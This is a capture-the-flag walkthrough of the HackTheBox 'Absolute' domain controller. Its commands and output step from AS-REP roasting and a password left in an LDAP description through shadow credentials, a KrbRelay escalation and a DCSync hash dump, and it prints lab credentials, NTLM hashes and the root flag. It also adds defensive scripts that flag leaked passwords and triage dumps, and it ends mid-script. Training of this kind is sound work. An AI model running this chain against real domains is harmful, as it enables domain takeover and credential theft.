A full TCP port sweep with a high minimum packet rate to get the open-port list quickly:

```
root@fdvoid0# nmap -p- --min-rate 10000 10.10.11.181
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-21 06:36 EDT
Nmap scan report for 10.10.11.181
Host is up (0.087s latency).
Not shown: 65509 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49686/tcp open  unknown
49692/tcp open  unknown
49699/tcp open  unknown
49703/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
```

The combination of DNS (53), Kerberos (88), kpasswd (464), LDAP and Global Catalog (389/636, 3268/3269) and ADWS (9389) is the signature of an Active Directory domain controller; 5985 is WinRM, which matters later for getting a shell. The high ephemeral ports are RPC endpoints and can be left out of the version scan.
Service and script scan on the interesting ports:

```
root@fdvoid0# nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.11.181
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-21 06:37 EDT
Nmap scan report for 10.10.11.181
Host is up (0.088s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-21 17:38:06Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after:  2023-06-09T08:14:24
|_ssl-date: 2023-05-21T17:40:40+00:00; +6h59m59s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after:  2023-06-09T08:14:24
|_ssl-date: 2023-05-21T17:40:39+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after:  2023-06-09T08:14:24
|_ssl-date: 2023-05-21T17:40:40+00:00; +6h59m59s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after:  2023-06-09T08:14:24
|_ssl-date: 2023-05-21T17:40:39+00:00; +7h00m00s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/21%Time=6469F493%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.96 seconds
```

Two things in this output shape the rest of the box. The LDAP banner gives the domain name absolute.htb and the certificate CN gives the DC's hostname dc.absolute.htb; both go into /etc/hosts pointing at 10.10.11.181, since most of the later commands address the DC by name. The ssl-date lines also show the DC's clock about seven hours ahead of the scanner. Kerberos rejects requests whose timestamp is more than five minutes off by default, so the local clock has to be brought in line with the DC (for example with ntpdate against 10.10.11.181, or by running each tool under faketime) before any of the Kerberos-based (-k) steps below will work.
Anonymous LDAP is a cheap first try:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# ldapsearch -H ldap://dc.absolute.htb -x -b "DC=absolute,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=absolute,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
```

The unauthenticated simple bind (-x with no credentials) is refused: the DC requires a successful bind before it answers any query, so LDAP enumeration has to wait until there are credentials.
DNS enumeration with dnsenum against absolute.htb (the invocation itself is not shown on the page):

```
Host's addresses:
__________________

absolute.htb.                            600      IN    A        10.10.11.181

Name Servers:
______________

dc.absolute.htb.                         1200     IN    A        10.10.11.181

Mail (MX) Servers:
___________________


Trying Zone Transfers and getting Bind Versions:
_________________________________________________

unresolvable name: dc.absolute.htb at /usr/bin/dnsenum line 900.

Trying Zone Transfer for absolute.htb on dc.absolute.htb ...
AXFR record query failed: no nameservers

Brute forcing with /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:
______________________________________________________________________________________

dc.absolute.htb.                         1200     IN    A        10.10.11.181
gc._msdcs.absolute.htb.                  600      IN    A        10.10.11.181
domaindnszones.absolute.htb.             600      IN    A        10.10.11.181
forestdnszones.absolute.htb.             600      IN    A        10.10.11.181

absolute.htb class C netranges:
________________________________


Performing reverse lookup on 0 ip addresses:
_____________________________________________

0 results out of 0 IP addresses.

absolute.htb ip blocks:
________________________

done.
```
None of this is useful, though: the zone transfer is refused, and the brute-forced names (gc._msdcs, DomainDnsZones, ForestDnsZones) are the standard records every AD-integrated DNS zone carries.
Website - TCP 80
The site is a simple page focused on design and images:
The images rotate every few seconds. The only link points to the template.
Tech Stack
The HTTP response headers only indicate IIS, nothing else:
```
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 07 Jun 2022 19:29:10 GMT
Accept-Ranges: bytes
ETag: "0877fdca47ad81:0"
Server: Microsoft-IIS/10.0
Date: Sun, 21 May 2023 23:50:51 GMT
Connection: close
Content-Length: 2909
```
The rotating images are worth pulling down and checking for metadata:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# exiftool hero_1.jpg
ExifTool Version Number         : 12.57
File Name                       : hero_1.jpg
Directory                       : .
File Size                       : 407 kB
File Modification Date/Time     : 2022:06:07 15:45:20-04:00
File Access Date/Time           : 2023:05:29 02:44:24-04:00
File Inode Change Date/Time     : 2023:05:29 02:44:24-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Little-endian (Intel, II)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Artist                          : James Roberts
Y Cb Cr Positioning             : Centered
Quality                         : 60%
XMP Toolkit                     : Image::ExifTool 11.88
Author                          : James Roberts
Creator Tool                    : Adobe Photoshop CC 2018 Macintosh
Derived From Document ID        : 6413FD608B5C21D0939F910C0EFBBE44
Derived From Instance ID        : 6413FD608B5C21D0939F910C0EFBBE44
Document ID                     : xmp.did:887A47FA048811EA8574B646AF4FC464
Instance ID                     : xmp.iid:887A47F9048811EA8574B646AF4FC464
DCT Encode Version              : 100
APP14 Flags 0                   : [14], Encoded with Blend=1 downsampling
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 1900
Image Height                    : 1150
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1900x1150
Megapixels                      : 2.2
```
James Roberts appears as both "Author" and "Artist". The other images have no "Artist", but every one of them has an "Author" field.
Generate Users List
With a list of people I can test candidate usernames against Kerberos to see which ones exist in the domain. First, build the list of names:
```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# for i in $(seq 1 6); do exiftool hero_${i}.jpg | grep Author | awk '{print $3 " " $4}'; done | tee users
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith
```
An AS-REP roast over the candidates in first-initial.lastname form (the command itself is not on the page; the output is in the format of Impacket's GetNPUsers.py):

```
[-] User j.roberts@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.chaffrey@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.osvald@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.robinson@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$d.klay@absolute.htb@ABSOLUTE.HTB:7babac3563f9d82cdd68fc5f6a8c35bf$6f67d29d9f1811e4fe60990d208c59ecf1850e55cc44ac5d2d31e8db12d663b514a2ab8f186fb70475960feffa9244139f153276a20dcbe4aa8d39739f419e6d19c13d4304c167c3854afa3da678b0594aa746b8f42ad39ef55c20aa501f817ba52722ab2c75b5eaeddf5ef8008bd3e61b2d19b672b7bb1db571b5c8d6cfe3ae357c731fa8c9bea2dad013b5b3439b2b0c4cbaff742d08dcfc1f7217f4c1818face9910b051b19567bdf0a0d68d715750d7cbad67c2c56064d1b8e5c3bdf7604fa408f76fc72012061bd2de8be211d57dddb04f93bf4122cb8d8a3d82be8c18e472184e798ae2477d70dea34
[-] User n.smith@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Every "doesn't have UF_DONT_REQUIRE_PREAUTH set" line is itself a confirmation that the account exists (the KDC answered with a pre-authentication-required error rather than unknown principal), so the f.lastname convention is the right one. d.klay has pre-authentication disabled, so the KDC hands out an AS-REP whose encrypted part (etype 23, RC4-HMAC) can be cracked offline; hashcat mode 18200 takes the `$krb5asrep$23$` line as-is. The cracked password, Darkmoonsky248girl, is what the following commands use.
With a valid domain account, BloodHound collection comes next. The -k switch makes bloodhound-python authenticate with the Kerberos ticket in the credential cache (a kinit as d.klay, not shown, must have been done first; the "Using TGT from cache" line confirms it), which is why the clock skew noted above has to be fixed first:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# bloodhound-python -u d.klay -p 'Darkmoonsky248girl' -k -d absolute.htb -dc dc.absolute.htb -ns 10.10.11.181 -c ALL --zip
INFO: Found AD domain: absolute.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.absolute.htb
INFO: Done in 01M 56S
INFO: Compressing output into 20230529130934_bloodhound.zip
```
Upload the zip into BloodHound, find d.klay, and mark the account as owned:
Unfortunately this user has no local admin rights, no execution rights, and no outbound object control:
SMB
With credentials, I can look at the SMB shares:
```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# crackmapexec smb dc.absolute.htb -k -u d.klay -p 'Darkmoonsky248girl' --shares
SMB         dc.absolute.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         dc.absolute.htb 445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl
SMB         dc.absolute.htb 445    DC               [+] Enumerated shares
SMB         dc.absolute.htb 445    DC               Share           Permissions     Remark
SMB         dc.absolute.htb 445    DC               -----           -----------     ------
SMB         dc.absolute.htb 445    DC               ADMIN$                          Remote Admin
SMB         dc.absolute.htb 445    DC               C$                              Default share
SMB         dc.absolute.htb 445    DC               IPC$            READ            Remote IPC
SMB         dc.absolute.htb 445    DC               NETLOGON        READ            Logon server share
SMB         dc.absolute.htb 445    DC               Shared
SMB         dc.absolute.htb 445    DC               SYSVOL          READ            Logon server share
```

The only non-default share is Shared, and d.klay has no permissions on it; the readable ones are the standard NETLOGON and SYSVOL.
Browsing with Impacket's smbclient.py (the invocation is not shown on the page; this run had no ticket cache and fell back to password authentication) confirms SYSVOL holds only the domain's policy tree:

```
[-] CCache file is not found. Skipping...
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use SYSVOL
# ls
drw-rw-rw-          0  Thu Jun  9 04:16:22 2022 .
drw-rw-rw-          0  Thu Jun  9 04:16:22 2022 ..
drw-rw-rw-          0  Thu Jun  9 04:16:22 2022 absolute.htb
```
LDAP can now be queried with the same credentials. crackmapexec's --users lists every account together with its description attribute:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# crackmapexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP        10.10.11.181    389    DC               [*] Total of records returned 20
LDAP        10.10.11.181    389    DC               Administrator                  Built-in account for administering the computer/domain
LDAP        10.10.11.181    389    DC               Guest                          Built-in account for guest access to the computer/domain
LDAP        10.10.11.181    389    DC               krbtgt                         Key Distribution Center Service Account
LDAP        10.10.11.181    389    DC               J.Roberts
LDAP        10.10.11.181    389    DC               M.Chaffrey
LDAP        10.10.11.181    389    DC               D.Klay
LDAP        10.10.11.181    389    DC               s.osvald
LDAP        10.10.11.181    389    DC               j.robinson
LDAP        10.10.11.181    389    DC               n.smith
LDAP        10.10.11.181    389    DC               m.lovegod
LDAP        10.10.11.181    389    DC               l.moore
LDAP        10.10.11.181    389    DC               c.colt
LDAP        10.10.11.181    389    DC               s.johnson
LDAP        10.10.11.181    389    DC               d.lemm
LDAP        10.10.11.181    389    DC               svc_smb                        AbsoluteSMBService123!
LDAP        10.10.11.181    389    DC               svc_audit
LDAP        10.10.11.181    389    DC               winrm_user                     Used to perform simple network tasks
```

The description of svc_smb is a password, AbsoluteSMBService123!, stored where any authenticated domain user can read it. Descriptions are readable by default for every account in the domain, so this is a classic place for credentials to leak.
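The svc_smb finding generalises: any authenticated user can read every account's description, so a quick scan of that attribute for password-like strings belongs in both the pentester's and the defender's checklist. The script below is an added example, not part of the write-up. Its input records are constructed to mirror the listing above (svc_smb is the only real leak; svc_backup and l.moore are made up to show a keyword hit and a harmless number), and in practice they would come from an LDAP query for sAMAccountName and description over (objectClass=user):

```python
"""Flag AD user descriptions that look like they carry a password.

Added example, not from the original write-up. Two signals are used:
a token that has the shape of a password (length, character classes,
at least one digit) and a keyword such as 'password' or 'pwd'.
"""
import re

# Constructed sample: (sAMAccountName, description). Mirrors the page's
# listing, plus two invented entries (svc_backup, l.moore) for coverage.
SAMPLE_USERS = [
    ("Administrator", "Built-in account for administering the computer/domain"),
    ("Guest", "Built-in account for guest access to the computer/domain"),
    ("krbtgt", "Key Distribution Center Service Account"),
    ("J.Roberts", ""),
    ("svc_smb", "AbsoluteSMBService123!"),
    ("svc_backup", "Backup service. pwd: B@ckup2022"),  # constructed
    ("winrm_user", "Used to perform simple network tasks"),
    ("l.moore", "Extension 4412"),                       # constructed
]

KEYWORD = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret)\b", re.I)


def looks_like_password(token: str) -> bool:
    """True for tokens of 8+ chars containing a digit and at least three of:
    lowercase, uppercase, digit, symbol. Plain words ('Built-in') fail the
    digit requirement, which keeps ordinary prose out of the results."""
    if len(token) < 8:
        return False
    lower = any(c.islower() for c in token)
    upper = any(c.isupper() for c in token)
    digit = any(c.isdigit() for c in token)
    symbol = any(not c.isalnum() for c in token)
    return digit and (lower + upper + digit + symbol) >= 3


def find_credential_leaks(records):
    """Return [(user, token_or_None, reason)] for descriptions worth a look.

    A password-shaped token is reported with the token itself; a keyword
    match without such a token is reported with the keyword so the analyst
    can read the full description by hand.
    """
    hits = []
    for user, desc in records:
        if not desc:
            continue
        tokens = [t.strip(".,;:\"'") for t in desc.split()]
        strong = [t for t in tokens if looks_like_password(t)]
        kw = KEYWORD.search(desc)
        if strong:
            hits.append((user, strong[0], "password-like token"))
        elif kw:
            hits.append((user, None, f"keyword '{kw.group(0)}'"))
    return hits


if __name__ == "__main__":
    for user, token, reason in find_credential_leaks(SAMPLE_USERS):
        print(f"{user:<14} {reason:<22} {token or ''}")
```

The same check is worth running over the info, comment and userPassword attributes, and over the description of computer and group objects, which are just as readable.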
To add a user to the Network Audit group, the first step is to make m.lovegod the owner of the group. An object's owner implicitly holds the right to rewrite its DACL, so once m.lovegod owns the group it can grant itself write access to the membership attribute and then add members. To change the owner of an object, use [owneredit.py] New example script to change an object's owner #1323, a script from an Impacket pull request.
```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# kinit m.lovegod
Password for m.lovegod@ABSOLUTE.HTB:

┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# net rpc group addmem "Network Audit" m.lovegod -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Password for [WORKGROUP\m.lovegod]:

┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Password for [WORKGROUP\m.lovegod]:
absolute\m.lovegod
absolute\svc_audit
```
The same two commands with the older -k switch give the same result; newer Samba versions only warn that -k is deprecated in favour of --use-kerberos=required:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# net rpc group addmem "Network Audit" m.lovegod -U 'm.lovegod' -k -S dc.absolute.htb
WARNING: The option -k|--kerberos is deprecated!

┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# net rpc group members "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb
WARNING: The option -k|--kerberos is deprecated!
absolute\m.lovegod
absolute\svc_audit
```
With m.lovegod now in Network Audit, Certipy is used to enumerate AD CS. The CA configuration cannot be read through the CSRA interface (access denied), so Certipy falls back to the remote registry (RRP), starting the RemoteRegistry service to do it:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# certipy find -username m.lovegod@absolute.htb -k -target dc.absolute.htb
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'absolute-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'absolute-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'absolute-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'absolute-DC-CA'
[*] Saved BloodHound data to '20230530133316_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230530133316_Certipy.txt'
[*] Saved JSON output to '20230530133316_Certipy.json'
```
The way into winrm_user is a shadow credentials attack. `certipy shadow auto` writes a new key credential into winrm_user's msDS-KeyCredentialLink attribute (this only works because the authenticating account has write access to that attribute), authenticates as winrm_user with the matching certificate through PKINIT, saves the resulting TGT to winrm_user.ccache, recovers the account's NT hash, and then restores the original attribute value:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# certipy shadow auto -k -no-pass -u absolute.htb/m.lovegod@dc.absolute.htb -dc-ip 10.10.11.181 -target dc.absolute.htb -account winrm_user
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '56abaff7-ff87-070d-beac-48aa003f33a9'
[*] Adding Key Credential with device ID '56abaff7-ff87-070d-beac-48aa003f33a9' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '56abaff7-ff87-070d-beac-48aa003f33a9' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
```

One caveat: winrm_user is a member of Protected Users (visible in the `net user` output further down). Members of that group cannot authenticate with NTLM, so the recovered NT hash is of no direct use for pass-the-hash; the Kerberos ticket in winrm_user.ccache is what logs in.
Evil-WinRM is pointed at the ticket cache through KRB5CCNAME together with the realm (-r). The first attempt fails locally because the evil-winrm wrapper's shebang points at a Ruby interpreter that is not installed; once that is fixed the shell comes up:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby3.0: no such file or directory

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
```
On the box, KrbRelay (copied to C:\programdata\KrbRelay1.exe) is used to relay the DC's own machine-account context, absolute.htb\DC$, from a local COM authentication to LDAP. The page shows two runs; the second one's objref is cut off:

```
[*] Relaying context: absolute.htb\DC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\programdata\KrbRelay1.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAB9vU64ftMuuYvY9fnAPSf9AogAABwX//+5tG+e1GpphiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
```

```
[*] Relaying context: absolute.htb\DC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\programdata\KrbRelay1.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABXmOFkCjduDHUSM3VtL2fUAoQAAOwU//9NMvzhG3NliiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP/
```
Once the relay has done its work, winrm_user shows up in the local Administrators group and root.txt is readable. (`net user` truncates group names to the column width, which is why Remote Management Users is printed as "Remote Management Use".)

```
*Evil-WinRM* PS C:\Users\winrm_user\Documents> net user winrm_user
User name                    winrm_user
Full Name
Comment                      Used to perform simple network tasks
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/9/2022 1:25:51 AM
Password expires             Never
Password changeable          6/10/2022 1:25:51 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/9/2022 7:13:12 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *Protected Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\winrm_user\Documents> cat C:\Users\Administrator\Desktop\root.txt
e9cefad9242174ae18798c39f2c275d5
```
For comparison, the same account before the escalation: only Remote Management Users locally, and the Protected Users membership that rules out NTLM:

```
*Evil-WinRM* PS C:\programdata> net user winrm_user
User name                    winrm_user
Full Name
Comment                      Used to perform simple network tasks
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/9/2022 1:25:51 AM
Password expires             Never
Password changeable          6/10/2022 1:25:51 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/31/2023 8:44:50 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Protected Users
The command completed successfully.
```
With the DC$ machine-account hash in hand, the whole NTDS can be pulled through directory replication (DCSync), since a domain controller's own account holds the replication rights. Two quirks in this run are worth knowing: crackmapexec has no -dc-ip switch for the smb protocol, so argparse reads `-dc-ip` as `-d c-ip` (the domain "c-ip" in the banner), which happens not to matter for a DC$ login but `-d absolute.htb` is the intended form; and the RemoteOperations error is the remote-registry path failing, after which the dump proceeds over DRSUAPI:

```
┌──(root💀kali)-[~/hackthebox/machine/absolute]
└─# crackmapexec smb -dc-ip dc.absolute.htb -u 'DC$' -H A7864AB463177ACB9AEC553F18F42577 --ntds
SMB         dc.absolute.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:c-ip) (signing:True) (SMBv1:False)
SMB         dc.absolute.htb 445    DC               [+] c-ip\DC$:A7864AB463177ACB9AEC553F18F42577
SMB         dc.absolute.htb 445    DC               [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB         dc.absolute.htb 445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc.absolute.htb 445    DC               Administrator\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1f4a6093623653f6488d5aa24c75f2ea:::
SMB         dc.absolute.htb 445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc.absolute.htb 445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ca378b063b18294fa5122c66c2280d4:::
SMB         dc.absolute.htb 445    DC               J.Roberts:1103:aad3b435b51404eeaad3b435b51404ee:7d6b7511772593b6d0a3d2de4630025a:::
SMB         dc.absolute.htb 445    DC               M.Chaffrey:1104:aad3b435b51404eeaad3b435b51404ee:13a699bfad06afb35fa0856f69632184:::
SMB         dc.absolute.htb 445    DC               D.Klay:1105:aad3b435b51404eeaad3b435b51404ee:21c95f594a80bf53afc78114f98fd3ab:::
SMB         dc.absolute.htb 445    DC               s.osvald:1106:aad3b435b51404eeaad3b435b51404ee:ab14438de333bf5a5283004f660879ee:::
SMB         dc.absolute.htb 445    DC               j.robinson:1107:aad3b435b51404eeaad3b435b51404ee:0c8cb4f338183e9e67bbc98231a8e59f:::
SMB         dc.absolute.htb 445    DC               n.smith:1108:aad3b435b51404eeaad3b435b51404ee:ef424db18e1ae6ba889fb12e8277797d:::
SMB         dc.absolute.htb 445    DC               m.lovegod:1109:aad3b435b51404eeaad3b435b51404ee:a22f2835442b3c4cbf5f24855d5e5c3d:::
SMB         dc.absolute.htb 445    DC               l.moore:1110:aad3b435b51404eeaad3b435b51404ee:0d4c6dccbfacbff5f8b4b31f57c528ba:::
SMB         dc.absolute.htb 445    DC               c.colt:1111:aad3b435b51404eeaad3b435b51404ee:fcad808a20e73e68ea6f55b268b48fe4:::
SMB         dc.absolute.htb 445    DC               s.johnson:1112:aad3b435b51404eeaad3b435b51404ee:b922d77d7412d1d616db10b5017f395c:::
SMB         dc.absolute.htb 445    DC               d.lemm:1113:aad3b435b51404eeaad3b435b51404ee:e16f7ab64d81a4f6fe47ca7c21d1ea40:::
SMB         dc.absolute.htb 445    DC               svc_smb:1114:aad3b435b51404eeaad3b435b51404ee:c31e33babe4acee96481ff56c2449167:::
SMB         dc.absolute.htb 445    DC               svc_audit:1115:aad3b435b51404eeaad3b435b51404ee:846196aab3f1323cbcc1d8c57f79a103:::
SMB         dc.absolute.htb 445    DC               winrm_user:1116:aad3b435b51404eeaad3b435b51404ee:8738c7413a5da3bc1d083efc0ab06cb2:::
SMB         dc.absolute.htb 445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:a7864ab463177acb9aec553f18f42577:::
SMB         dc.absolute.htb 445    DC               [+] Dumped 18 NTDS hashes to /root/.cme/logs/DC_dc.absolute.htb_2023-05-31_120153.ntds of which 17 were added to the database
```

The winrm_user hash matches the one Certipy recovered earlier, and the Guest entry carries 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of the empty password (the account is disabled by default, so this is expected).
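A dump like this is usually triaged before any cracking starts: which accounts have an empty password, which still have an LM hash stored (LM storage should be off on any modern domain), and which accounts share an NT hash, meaning the same password. The script below is an added example, not part of the write-up; it accepts both raw secretsdump-style lines and the crackmapexec-prefixed lines shown above. The sample dump is constructed and its hashes are made up, apart from the two well-known constants for the empty LM hash and the NT hash of the empty password:

```python
"""Parse and triage an NTDS dump in secretsdump / crackmapexec --ntds format.

Added example, not from the original write-up. Each line carries
    [DOMAIN\\]user:rid:lmhash:nthash:::
possibly preceded by crackmapexec's "SMB host 445 DC" column prefix.
"""
import re
from collections import defaultdict
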